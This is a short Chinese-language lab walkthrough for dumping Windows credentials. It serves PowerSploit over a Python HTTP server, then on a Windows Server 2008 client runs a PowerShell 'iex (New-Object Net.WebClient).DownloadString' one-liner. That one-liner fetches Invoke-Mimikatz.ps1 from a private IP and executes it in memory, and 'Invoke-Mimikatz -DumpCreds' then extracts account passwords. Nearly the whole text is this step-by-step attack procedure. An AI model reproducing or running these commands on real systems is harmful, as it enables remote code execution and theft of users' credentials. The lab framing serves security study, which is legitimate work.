-
实验环境
服务器端:Windows 7(python 3.7.2)
客户端:Windows server 2008
这里自动获取IP地址
-
实验步骤
1.从https://github.com/PowerShellMafia/PowerSploit下载黑客脚本并解压保存在服务器端(Windows7).
2.在Win7虚拟机Cmd下,键入cd命令切换到黑客脚本所在目录.
3.执行命令:python -m http.server 80.
利用python搭建web服务站点(开放了80端口),此时任意主机均可连接.
4.测试Web服务站点是否搭建成功.
5.在客户端加载并执行服务器端脚本.
在客户端(Windows Server 2008)的PowerShell中输入: iex(New- Object Net.WebClient).DownloadString(‘http://192.168.19.129/Exfiltration/Invoke-Mimikatz.ps1’)
6.再次输入Invoke-Mimikatz -DumpCreds,便可得到客户端的账号和密码.
